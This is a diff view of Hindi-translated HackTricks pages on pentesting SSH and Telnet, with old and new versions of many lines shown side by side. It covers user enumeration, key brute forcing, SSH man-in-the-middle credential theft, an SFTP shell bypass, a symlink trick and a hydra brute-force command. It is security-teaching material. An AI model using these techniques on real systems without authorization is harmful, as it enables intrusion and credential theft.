* [libssh](https://www.libssh.org) मल्टीप्लेटफॉर्म C पुस्तकालय जो SSHv2 प्रोटोकॉल को लागू करता है और [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) और [R](https://github.com/ropensci/ssh) में बाइंडिंग्स के साथ; इसका उपयोग KDE द्वारा sftp के लिए और GitHub द्वारा git SSH इंफ्रास्ट्रक्चर के लिए किया जाता है
* [wolfSSH](https://www.wolfssl.com/products/wolfssh/) ANSI C में लिखित SSHv2 सर्वर पुस्तकालय जो एम्बेडेड, RTOS, और संसाधन-सीमित वातावरणों के लिए लक्षित है
* [wolfSSH](https://www.wolfssl.com/products/wolfssh/) ANSI C में लिखित SSHv2 सर्वर पुस्तकालय जो एम्बेडेड, RTOS, और संसाधन-सीमित वातावरण के लिए लक्षित है
* [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) Apache SSHD java पुस्तकालय Apache MINA पर आधारित है
* [paramiko](https://github.com/paramiko/paramiko) Python SSHv2 प्रोटोकॉल पुस्तकालय
@ -50,18 +52,18 @@ nc -vn <IP> 22
ssh-audit एक उपकरण है जो ssh सर्वर और क्लाइंट कॉन्फ़िगरेशन की ऑडिटिंग करता है।
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) यह [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/) से अपडेटेड फोर्क है
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) एक अपडेटेड फोर्क है [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/) से।
**विशेषताएं:**
* SSH1 और SSH2 प्रोटोकॉल सर्वर समर्थन;
* SSH क्लाइंट कॉन्फ़िगरेशन का विश्लेषण करें;
* बैनर प्राप्त करें, डिवाइस या सॉफ़्टवेयर और ऑपरेटिंग सिस्टम की पहचान करें, संपीड़न का पता लगाएं;
* की-एक्सचेंज, होस्ट-की, एन्क्रिप्शन और मैसेज ऑथेंटिकेशन कोड एल्गोरिदम्स की जानकारी एकत्र करें;
* एल्गोरिदम जानकारी का आउटपुट (उपलब्ध होने के बाद से, हटाया/अक्षम, असुरक्षित/कमजोर/पुराना, आदि);
* एल्गोरिदम सिफारिशों का आउटपुट (पहचाने गए सॉफ़्टवेयर संस्करण के आधार पर जोड़ें या हटाएं);
* सुरक्षा जानकारी का आउटपुट (संबंधित मुद्दे, असाइन किए गए CVE सूची, आदि);
* एल्गोरिदम जानकारी के आधार पर SSH संस्करण संगतता का विश्लेषण;
* की-एक्सचेंज, होस्ट-की, एन्क्रिप्शन और मैसेज ऑथेंटिकेशन कोड एल्गोरिदम्स एकत्र करें;
* एल्गोरिदम जानकारी आउटपुट करें (उपलब्ध होने के बाद से, हटाया/अक्षम, असुरक्षित/कमजोर/पुराना, आदि);
* एल्गोरिदम सिफारिशें आउटपुट करें (पहचाने गए सॉफ़्टवेयर संस्करण के आधार पर जोड़ें या हटाएं);
* सुरक्षा जानकारी आउटपुट करें (संबंधित मुद्दे, असाइन किए गए CVE सूची, आदि);
* एल्गोरिदम जानकारी के आधार पर SSH संस्करण संगतता का विश्लेषण करें;
* OpenSSH, Dropbear SSH और libssh से ऐतिहासिक जानकारी;
* Linux और Windows पर चलता है;
* कोई निर्भरता नहीं
@ -87,7 +89,7 @@ $ python3 ssh-audit <IP>
```
[इसे क्रिया में देखें (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
### सर्वर की सार्वजनिक SSH कुंजी
### सर्वर की पब्लिक SSH कुंजी
```bash
ssh-keyscan -t rsa <IP> -p <PORT>
```
@ -111,7 +113,7 @@ nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check a
### यूजरनेम एन्युमरेशन
कुछ OpenSSH के संस्करणों में आप यूजर्स को गिनने के लिए एक टाइमिंग अटैक कर सकते हैं। इसका फायदा उठाने के लिए आप मेटास्प्लॉइट मॉड्यूल का उपयोग कर सकते हैं:
कुछ OpenSSH के संस्करणों में आप यूजर्स को गिनने के लिए टाइमिंग अटैक कर सकते हैं। आप इसका फायदा उठाने के लिए मेटास्प्लॉइट मॉड्यूल का उपयोग कर सकते हैं:
```
msf> use scanner/ssh/ssh_enumusers
```
@ -129,19 +131,21 @@ https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
```
msf> use scanner/ssh/ssh_identify_pubkeys
```
या `ssh-keybrute.py` का उपयोग करें (मूल python3, हल्का और पुरानी एल्गोरिदम सक्षम है): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
#### ज्ञात खराब कुंजियाँ यहाँ पाई जा सकती हैं:
{% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %}
#### कमजोर SSH कुंजियाँ / Debian अनुमानित PRNG
कुछ सिस्टम्स में क्रिप्टोग्राफिक सामग्री उत्पन्न करने के लिए इस्तेमाल किए गए रैंडम सीड में ज्ञात दोष होते हैं। इससे कीस्पेस में भारी कमी आ सकती है जिसे ब्रूटफोर्स किया जा सकता है। कमजोर PRNG से प्रभावित Debian सिस्टम्स पर उत्पन्न पूर्व-निर्मित कुंजी सेट यहाँ उपलब्ध हैं: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
कुछ सिस्टम्स में क्रिप्टोग्राफिक सामग्री उत्पन्न करने के लिए इस्तेमाल किए गए रैंडम सीड में ज्ञात दोष होते हैं। इससे कीस्पेस में भारी कमी आ सकती है जिसे ब्रूटफोर्स किया जा सकता है। कमजोर PRNG से प्रभावित Debian सिस्टम्स पर उत्पन्न की गई कुंजियों के पूर्व-निर्मित सेट यहाँ उपलब्ध हैं: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
आपको यहाँ देखना चाहिए ताकि पीड़ित मशीन के लिए मान्य कुंजियों की खोज कर सकें
पीड़ित मशीन के लिए मान्य कुंजियों की खोज के लिए आपको यहाँ देखना चाहिए
### Kerberos
**crackmapexec** `ssh` प्रोटोकॉल का उपयोग करते हुए `--kerberos` विकल्प का उपयोग करके **kerberos के माध्यम से प्रमाणीकरण** कर सकता है।\
**crackmapexec** `ssh` प्रोटोकॉल का उपयोग करते समय `--kerberos` विकल्प का उपयोग करके **kerberos के माध्यम से प्रमाणीकरण** कर सकता है।\
अधिक जानकारी के लिए `crackmapexec ssh --help` चलाएं।
## डिफ़ॉल्ट क्रेडेंशियल्स
@ -165,13 +169,13 @@ msf> use scanner/ssh/ssh_identify_pubkeys
## SSH-MitM
यदि आप पीड़ित के स्थानीय नेटवर्क में हैं जो SSH सर्वर से उपयोगकर्ता नाम और पासवर्ड का उपयोग करके कनेक्ट होने वाला है, तो आप उन क्रेडेंशियल्स को चुराने के लिए **MitM हमला करने का प्रयास कर सकते हैं:**
यदि आप पीड़ित के स्थानीय नेटवर्क में हैं जो उपयोगकर्ता नाम और पासवर्ड का उपयोग करके SSH सर्वर से कनेक्ट होने वाला है, तो आप उन क्रेडेंशियल्स को चुराने के लिए **MitM हमला करने का प्रयास कर सकते हैं:**
**हमले का मार्ग:**
* उपयोगकर्ता ट्रैफिक को हमलावर मशीन की ओर रीडायरेक्ट किया जाता है
* हमलावर SSH सर्वर से कनेक्ट करने के प्रयासों की निगरानी करता है और उन्हें अपने SSH सर्वर की ओर रीडायरेक्ट करता है
* हमलावर का SSH सर्वर पहले, सभी दर्ज किए गए डेटा को लॉग करने के लिए, और दूसरे, वैध SSH सर्वर को कमांड भेजने के लिए जिससे उपयोगकर्ता कनेक्ट होना चाहता है, उन्हें निष्पादित करने के लिए, और फिर परिणामों को वैध उपयोगकर्ता को वापस भेजने के लिए कॉन्फ़िगर किया जाता है
* हमलावर का SSH सर्वर पहले, सभी दर्ज किए गए डेटा को लॉग करने के लिए, और दूसरे, वैध SSH सर्वर पर कमांड भेजने के लिए कॉन्फ़िगर किया जाता है जिससे उपयोगकर्ता कनेक्ट होना चाहता है, उन्हें निष्पादित करने के लिए, और फिर परिणामों को वैध उपयोगकर्ता को वापस भेजने के लिए
[**SSH MITM**](https://github.com/jtesta/ssh-mitm) ऊपर वर्णित कार्य को ठीक वैसे ही करता है।
@ -185,7 +189,7 @@ msf> use scanner/ssh/ssh_identify_pubkeys
**openSSH के लिए रूट लॉगिन को अक्षम करने का तरीका:**
1. SSH सर्वर कॉन्फ़िगरेशन `sudoedit /etc/ssh/sshd_config` को संपादित करें
1. SSH सर्वर कॉन्फ़िगरेशन `sudoedit /etc/ssh/sshd_config` संपादित करें
2. `#PermitRootLogin yes` को `PermitRootLogin no` में बदलें
3. कॉन्फ़िगरेशन परिवर्तनों को ध्यान में रखें: `sudo systemctl daemon-reload`
4. SSH सर्वर को पुनः आरंभ करें `sudo systemctl restart sshd`
@ -196,7 +200,7 @@ msf> use scanner/ssh/ssh_identify_pubkeys
### SFTP कमांड निष्पादन
SFTP कॉन्फ़िगरेशन में अक्सर देखी जाने वाली एक आम मिसकॉन्फ़िगरेशन है। ज्यादातर समय जब एक SFTP सर्वर बनाना होता है तो प्रशासक चाहते हैं कि उपयोगकर्ताओं को फाइलें साझा करने के लिए SFTP एक्सेस हो लेकिन मशीन पर रिमोट शेल प्राप्त करने की अनुमति न हो। इसलिए वे सोचते हैं कि एक उपयोगकर्ता बनाना, उसे एक प्लेसहोल्डर शेल (जैसे `/usr/bin/nologin` या `/usr/bin/false`) देना और उसे एक जेल में च्रूट करना पर्याप्त है ताकि शेल एक्सेस या पूरे फाइल सिस्टम पर दुरुपयोग से बचा जा सके। लेकिन वे गलत हैं, **एक उपयोगकर्ता प्रमाणीकरण के तुरंत बाद एक कमांड निष्पादित करने के लिए कह सकता है इससे पहले कि उसका डिफ़ॉल्ट कमांड या शेल निष्पादित हो**। इसलिए प्लेसहोल्डर शेल को बायपास करने के लिए जो शेल एक्सेस से इनकार कर देगा, किसी को केवल एक कमांड (उदा. `/bin/bash`) को पहले निष्पादित करने के लिए कहना होगा, बस यह करके:
SFTP कॉन्फ़िगरेशन में अक्सर देखी जाने वाली एक आम SSH मिसकॉन्फ़िगरेशन है। ज्यादातर समय जब एक SFTP सर्वर बनाते हैं तो प्रशासक चाहते हैं कि उपयोगकर्ताओं को फाइलें साझा करने के लिए SFTP एक्सेस हो लेकिन मशीन पर रिमोट शेल प्राप्त करने की अनुमति न हो। इसलिए वे सोचते हैं कि एक उपयोगकर्ता बनाना, उसे एक प्लेसहोल्डर शेल (जैसे `/usr/bin/nologin` या `/usr/bin/false`) देना और उसे एक जेल में च्रूट करना पर्याप्त है शेल एक्सेस या पूरे फाइल सिस्टम पर दुरुपयोग से बचने के लिए। लेकिन वे गलत हैं, **एक उपयोगकर्ता प्रमाणीकरण के तुरंत बाद एक कमांड निष्पादित करने के लिए कह सकता है इससे पहले कि उसका डिफ़ॉल्ट कमांड या शेल निष्पादित हो**। इसलिए प्लेसहोल्डर शेल को बायपास करने के लिए जो शेल एक्सेस से इनकार कर देगा, किसी को केवल एक कमांड (उदा. `/bin/bash`) को पहले निष्पादित करने के लिए कहना होगा, बस यह करके:
```bash
ssh -v noraj@192.168.1.94 id
...
@ -237,13 +241,13 @@ sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compro
```
### SFTP Symlink
**sftp** में "**symlink**" नामक कमांड होता है। इसलिए, यदि आपके पास किसी फोल्डर में **लिखने के अधिकार** हैं, तो आप **अन्य फोल्डर्स/फाइलों** के **symlinks** बना सकते हैं। चूंकि आप शायद एक chroot के अंदर **फंसे** हुए हैं, यह आपके लिए **विशेष रूप से उपयोगी नहीं होगा**, लेकिन, यदि आप **no-chroot** **सेवा** से बनाए गए **symlink** तक **पहुच** सकते हैं (उदाहरण के लिए, यदि आप वेब से symlink तक पहुच सकते हैं), तो आप **वेब के माध्यम से symlinked फाइलों को खोल सकते हैं**।
**sftp** में "**symlink**" नामक आदेश होता है। इसलिए, यदि आपके पास किसी फोल्डर में **लिखने के अधिकार** हैं, तो आप **अन्य फ़ोल्डरों/फ़ाइलों** के **symlinks** बना सकते हैं। चूंकि आप शायद एक chroot के अंदर **फंसे** हुए हैं, यह आपके लिए **विशेष रूप से उपयोगी नहीं होगा**, लेकिन, यदि आप **no-chroot** **सेवा** से बनाए गए **symlink** तक **पहुच** सकते हैं (उदाहरण के लिए, यदि आप वेब से symlink तक पहुच सकते हैं), तो आप **वेब के माध्यम से symlinked फाइलों को खोल सकते हैं**।
उदाहरण के लिए, नई फाइल **"**_**froot**_**" से "**_**/**_**"** के लिए एक **symlink** बनाने के लिए:
उदाहरण के लिए, नई फाइल **"**_**froot**_**" से "**_**/**_**"** के लिए एक **symlink** बनाने के लिए:
```bash
sftp> symlink / froot
```
यदि आप वेब के माध्यम से "_froot_" फाइल तक पहुँच सकते हैं, तो आप सिस्टम के रूट ("/") फोल्डर की सूची बना सकेंगे।
यदि आप वेब के माध्यम से "_froot_" फाइल तक पहुँच सकते हैं, तो आप सिस्टम के रूट ("/") फोल्डर की सूची बना सकेंगे।
### प्रमाणीकरण विधियाँ
@ -263,7 +267,7 @@ debug1: Next authentication method: password
### कॉन्फ़िग फ़ाइलें
SSH सर्वर कॉन्फ़िगरेशन की समीक्षा यह जांचने के लिए आवश्यक है कि केवल अपेक्षित\
तरीके अधिकृत हैं। क्लाइंट पर वर्बोज़ मोड का उपयोग करने से कॉन्फ़िगरेशन की प्रभावशीलता को देखने में मदद मिल सकती है।
तरीके अधिकृत हैं। क्लाइंट पर वर्बोज़ मोड का उपयोग कॉन्फ़िगरेशन की प्रभावशीलता को देखने में मदद कर सकता है।
```bash
ssh_config
sshd_config
@ -272,19 +276,19 @@ ssh_known_hosts
known_hosts
id_rsa
```
## Fuzzing
## फज़िंग
* [https://packetstormsecurity.com/files/download/71252/sshfuzz.txt](https://packetstormsecurity.com/files/download/71252/sshfuzz.txt)
* [https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2](https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2)
## संदर्भ
* SSH को सुरक्षित बनाने पर दिलचस्प गाइड आप यहाँ पा सकते हैं [https://www.ssh-audit.com/hardening_guides.html](https://www.ssh-audit.com/hardening_guides.html)
* SSH को मजबूत बनाने पर दिलचस्प गाइड्स आप यहाँ पा सकते हैं [https://www.ssh-audit.com/hardening_guides.html](https://www.ssh-audit.com/hardening_guides.html)
* [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
यदि आप **हैकिंग करियर** में रुचि रखते हैं और अभेद्य को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_पोलिश भाषा में प्रवीणता आवश्यक है_).
यदि आप **हैकिंग करियर** में रुचि रखते हैं और अभेद्य को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_धाराप्रवाह पोलिश लिखित और बोली जरूरी है_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -308,12 +312,14 @@ Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **hacktricks repo** में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
</details>

136
network-services-pentesting/pentesting-telnet.md
View file

@ -2,131 +2,59 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
</details>
<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
[**DragonJAR Security Conference एक अंतर्राष्ट्रीय साइबर सुरक्षा इवेंट है**](https://www.dragonjarcon.org/) जो एक दशक से अधिक समय से चल रहा है और 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में आयोजित किया जाएगा। यह एक उच्च तकनीकी सामग्री वाला इवेंट है जहां स्पेनिश में नवीनतम अनुसंधान प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करते हैं।\
अब निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
## **मूलभूत जानकारी**
## **मूल जानकारी**
टेलनेट एक नेटवर्क प्रोटोकॉल है जो उपयोगकर्ताओं को नेटवर्क के माध्यम से कंप्यूटर तक पहुंचने का एक असुरक्षित तरीका प्रदान करता है।
टेलनेट एक नेटवर्क प्रोटोकॉल है जो उपयोगकर्ताओं को एक नेटवर्क के जरिए कंप्यूटर तक एक असुरक्षित तरीके से पहुंच प्रदान करता है।
**डिफ़ॉल्ट पोर्ट:** 23
```
23/tcp open telnet
```
बैनर ग्रबिंग
## **एन्यूमरेशन**
### **बैनर ग्रैबिंग**
```bash
nc -vn <IP> 23
```
सभी रोचक जाँच निर्देशिक**nmap** द्वारा की जा सकती है:
सभी दिलचस्प गणन**nmap** द्वारा की जा सकती है:
```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
स्क्रिप्ट `telnet-ntlm-info.nse` NTLM जानकारी (Windows संस्करण) प्राप्त करेगा।
```
स्क्रिप्ट `telnet-ntlm-info.nse` NTLM जानकारी (Windows संस्करण) प्राप्त करेगी।
टेलनेट प्रोटोकॉल में विभिन्न "**विकल्प**" होते हैं जो स्वीकृत किए जाएंगे और "**DO, DON'T, WILL, WON'T**" संरचना के साथ उपयोग किए जा सकते हैं ताकि उपयोगकर्ता और सर्वर अपने टेलनेट कनेक्शन के लिए एक अधिक विस्तृत (या शायद बस अलग) समझौते सेट का उपयोग करने के लिए सहमत हो सकें। ऐसे विकल्पों में चरित्र सेट, इको मोड आदि शामिल हो सकते हैं। ([टेलनेट RFC](https://tools.ietf.org/html/rfc854) से) \
**मुझे पता है कि इन विकल्पों की गणना संभव है, लेकिन मुझे नहीं पता कि इसे कैसे करें, इसलिए अगर आपको पता है तो मुझे बताएं।**
TELNET प्रोटोकॉल में विभिन्न "**विकल्प**" होते हैं जिन्हें मंजूरी दी जाएगी और "**DO, DON'T, WILL, WON'T**" संरचना के साथ उपयोग किया जा सकता है ताकि एक उपयोगकर्ता और सर्वर अपने TELNET कनेक्शन के लिए एक अधिक जटिल (या शायद बस अलग) सम्मेलन सेट का उपयोग करने पर सहमत हो सकें। ऐसे विकल्पों में चरित्र सेट बदलना, इको मोड आदि शामिल हो सकते हैं। ( [telnet RFC](https://tools.ietf.org/html/rfc854) से)
**मुझे पता है कि इन विकल्पों को सूचीबद्ध करना संभव है लेकिन मुझे नहीं पता कैसे, इसलिए अगर आपको पता है तो मुझे बताएं।**
### [ब्रूट फोर्स](../generic-methodologies-and-resources/brute-force.md#telnet)
### [Brute force](../generic-methodologies-and-resources/brute-force.md#telnet)
## कॉन्फ़िग फ़ाइल
## Config फ़ाइल
```
```bash
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
```
## HackTricks स्वचालित आदेश
### Telnet
Telnet is a network protocol used to establish a remote shell session with a host over the Internet. It is commonly used for remote administration and troubleshooting purposes. However, it is also a common target for hackers due to its lack of security features.
#### Telnet Banner Grabbing
Banner grabbing is a technique used to gather information about a target system by capturing the banner message that is displayed when connecting to a service. Telnet banner grabbing can provide valuable information about the target system, such as the operating system, version, and other details.
To perform telnet banner grabbing, you can use the following command:
```bash
telnet <target_ip> <port>
```
Replace `<target_ip>` with the IP address of the target system and `<port>` with the port number of the telnet service.
#### Telnet Brute-Force Attack
A brute-force attack is a method of trying all possible combinations of passwords until the correct one is found. Telnet brute-force attacks involve repeatedly attempting to log in to a telnet service using different username and password combinations.
To perform a telnet brute-force attack, you can use the following command:
```bash
hydra -l <username> -P <password_list> <target_ip> telnet
```
Replace `<username>` with the desired username, `<password_list>` with the path to a file containing a list of passwords, and `<target_ip>` with the IP address of the target system.
#### Telnet Command Injection
Telnet command injection is a vulnerability that allows an attacker to execute arbitrary commands on a target system by injecting malicious commands into a telnet session. This can be exploited if the telnet service does not properly sanitize user input.
To perform a telnet command injection, you can use the following command:
```bash
telnet <target_ip> <port>
```
Once connected, you can try injecting commands by entering them directly into the telnet session.
#### Telnet Password Sniffing
Telnet password sniffing is a technique used to capture passwords sent over a telnet session. This can be done by intercepting network traffic and analyzing it to extract the passwords.
To perform telnet password sniffing, you can use tools like Wireshark to capture and analyze the network traffic.
#### Telnet Remote Code Execution
Telnet remote code execution is a vulnerability that allows an attacker to execute arbitrary code on a target system by exploiting a flaw in the telnet service. This can be done by sending specially crafted commands or data to the telnet service.
To perform telnet remote code execution, you need to identify and exploit a specific vulnerability in the telnet service. This typically requires advanced knowledge and expertise in vulnerability research and exploitation techniques.
#### Telnet Man-in-the-Middle Attack
A man-in-the-middle (MITM) attack is a type of attack where an attacker intercepts and alters communication between two parties without their knowledge. Telnet sessions can be vulnerable to MITM attacks if the communication is not encrypted.
To perform a telnet MITM attack, you can use tools like Ettercap or Wireshark to intercept and manipulate the telnet traffic.
#### Telnet Password Cracking
Telnet password cracking is the process of recovering passwords from a telnet service by using various techniques such as brute-forcing, dictionary attacks, or rainbow table attacks.
To perform telnet password cracking, you can use tools like Hydra or John the Ripper to automate the password recovery process.
#### Telnet Exploits
There are various known vulnerabilities and exploits for the telnet service. These exploits can be used to gain unauthorized access to a target system or execute arbitrary code.
To find and exploit telnet vulnerabilities, you can search for known exploits in vulnerability databases or use tools like Metasploit to automate the exploitation process.
#### Telnet Post-Exploitation
Once you have gained access to a target system through telnet, you can perform various post-exploitation activities to further compromise the system or gather information.
Some common post-exploitation activities include privilege escalation, lateral movement, data exfiltration, and maintaining persistence on the target system.
To perform telnet post-exploitation, you can use various tools and techniques depending on your objectives and the target system's configuration.
```
Protocol_Name: Telnet #Protocol Abbreviation if there is one.
Port_Number: 23 #Comma separated if there is more than one.
@ -160,19 +88,21 @@ Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOS
```
<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**ड्रैगनजार सुरक्षा सम्मेलन एक अंतर्राष्ट्रीय साइबर सुरक्षा कार्यक्रम है**](https://www.dragonjarcon.org/), जो 7 और 8 सितंबर 2023 को कोलंबिया के बोगोटा में आयोजित होगा। यह एक तकनीकी भरपूर सामग्री वाला कार्यक्रम है जहां स्पेनिश में नवीनतम शोध प्रस्तुत किए जाते हैं और यह दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करता है।\
इस महान सम्मेलन को न छोड़ें, अब नीचे दिए गए लिंक पर रजिस्टर करें!:
[**DragonJAR Security Conference एक अंतरराष्ट्रीय साइबर सुरक्षा इवेंट है**](https://www.dragonjarcon.org/) जो एक दशक से अधिक समय से आयोजित हो रहा है और यह 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में होगा। यह एक उच्च तकनीकी सामग्री वाला इवेंट है जहां स्पेनिश में नवीनतम अनुसंधान प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करते हैं।\
अभी निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
